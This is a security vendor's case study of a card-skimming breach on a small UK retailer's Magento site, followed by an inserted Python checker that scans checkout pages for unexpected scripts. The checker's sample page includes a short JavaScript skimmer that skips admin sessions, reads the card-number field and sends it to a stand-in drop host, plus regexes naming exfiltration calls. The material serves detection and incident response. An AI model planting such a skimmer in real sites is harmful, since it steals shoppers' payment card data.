Acquirer-Led Investigation Uncovers Web Skimming Attack

INDUSTRY

eCommerce & Retail

LOCATION

United Kingdom

SERVICES PROVIDED BY FOREGENIX

Acquirer-Led Investigation (ALI)

Root Cause Analysis

PCI DSS Compliance


About the Client

Our client is a small UK-based e-commerce retailer specialising in high-end outdoor equipment. With 20 employees, the business relies entirely on online sales via a Magento 2 website and uses Stripe as its payment processor. The merchant had a clean history of compliance but lacked in-house cybersecurity expertise. (Client name protected for confidentiality.)

The Challenge: Evidence of a Card Skimming Breach

The Initial Alert:
The client was contacted by their acquiring bank after a card scheme raised a Common Point of Purchase (CPP) alert, linking a small cluster of fraudulent transactions to their website. No visible signs of compromise had been detected internally.

The Suspicion:
Due to the nature of the transactions and timeline, the card scheme required an Acquirer-Led Investigation (ALI) to determine whether the merchant environment had been compromised and whether cardholder data was at risk.

The Business Risks:

  • Potential compromise of customer payment data via undetected web skimming
  • Regulatory exposure if data protection obligations were breached
  • PCI DSS compliance impact if weaknesses were found
  • Risk of reputational damage and increased chargebacks if the breach was confirmed

The Solution: Acquirer-Led Investigation by Foregenix


  • Step 1: Engagement & Evidence Collection

    The acquiring bank formally referred the case to Foregenix as an ALI provider. The Cyber Defence Team contacted the merchant within hours and issued a clear evidence request covering web server logs, application codebase, admin access logs, and recent change records.

  • Step 2: Forensic Review of the Website

    Our team performed source code analysis and log review on the client's Magento site. Within 24 hours, we identified a JavaScript skimmer injected via a third-party plugin that had not been updated in over a year. The skimmer selectively activated on the checkout page for non-admin users, avoiding internal detection.

  • Step 3: Root Cause Analysis

    The attack vector was linked to a vulnerable plugin that allowed unauthenticated file uploads. The attacker used this to plant malicious JavaScript code and exfiltrate cardholder data in real time to an external drop server.

  • Step 4: Risk Assessment & Reporting

    We assessed the timeframe of the compromise, the volume of potentially exposed cardholder data, and the merchant’s cooperation. The final ALI report was delivered to the acquirer, confirming the compromise, detailing the data-at-risk, and recommending mitigation.
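A defender-side check for the skimmer behaviour described in Steps 2 and 3, added here as an example and not code from Foregenix or the client: it parses a checkout page's HTML, flags any script tag served from a host outside an assumed allowlist (the shop's own host and the PSP's), and flags inline scripts that both read card fields and contain a way to send data out. The allowlist, the heuristics and the sample page are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: only these hosts may serve checkout scripts; a relative src is first-party.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.stripe.com"}
# Inline-script heuristic: touches card fields AND has a way to send data out.
CARD_FIELD_RE = re.compile(r"card|cvv|cvc|cc_|expir", re.I)
EXFIL_RE = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new Image\(", re.I)

class ScriptCollector(HTMLParser):
    # Collects external script URLs and inline script bodies from HTML.
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self.inline.append("")
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def find_suspicious_scripts(html):
    """Return (kind, detail) findings; an empty list means nothing unexpected."""
    p = ScriptCollector()
    p.feed(html)
    hosts = [(s, urlparse(s).hostname) for s in p.external]
    findings = [("external", s) for s, h in hosts if h and h not in ALLOWED_SCRIPT_HOSTS]
    findings += [("inline", b.strip()[:60]) for b in p.inline
                 if CARD_FIELD_RE.search(b) and EXFIL_RE.search(b)]
    return findings

# Constructed sample: legitimate PSP and first-party scripts plus an injected
# skimmer that skips admin sessions, reads the card field and beacons it out.
SAMPLE_CHECKOUT = """<html><body>
<script src="https://js.stripe.com/v3/"></script>
<script src="/static/frontend/checkout.js"></script>
<script src="https://cdn.drop-server.test/x.js"></script>
<script>if(!document.cookie.includes('admin')){var cc=document.querySelector('#cc_number').value;
new Image().src='https://drop-server.test/c?d='+btoa(cc);}</script>
</body></html>"""
```

Running `find_suspicious_scripts(SAMPLE_CHECKOUT)` on a schedule against the live checkout page, and alerting on any non-empty result, gives the kind of early signal the merchant lacked during the six-week compromise window.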

The Results: Risk Contained and Compliance Restored


  • Compromise Confirmed: The attack was active for approx. 6 weeks before detection

  • Data-at-Risk Identified: The data-at-risk was clearly defined as all transactions during the compromise window

  • Rapid Containment: The malicious code was removed within 48 hours of ALI initiation

  • Remediation Implemented:

    • Outdated plugin removed and replaced

    • Admin credentials rotated

    • File upload restrictions enforced

    • Logging and change management enhanced

  • PCI DSS Remediation Confirmed: Merchant resumed full compliance under acquirer oversight

Why Foregenix Cyber Defence Team

The merchant had no prior relationship with Foregenix, but chose to proceed with the investigation upon the acquirer’s recommendation due to our status as an approved Acquirer-Led Investigation provider. Foregenix’s speed of engagement, clear communication, and deep experience with Magento-based breaches stood out immediately. The Cyber Defence Team guided the client through a full review, mitigation, and restoration of trust with their acquirer and PSP.
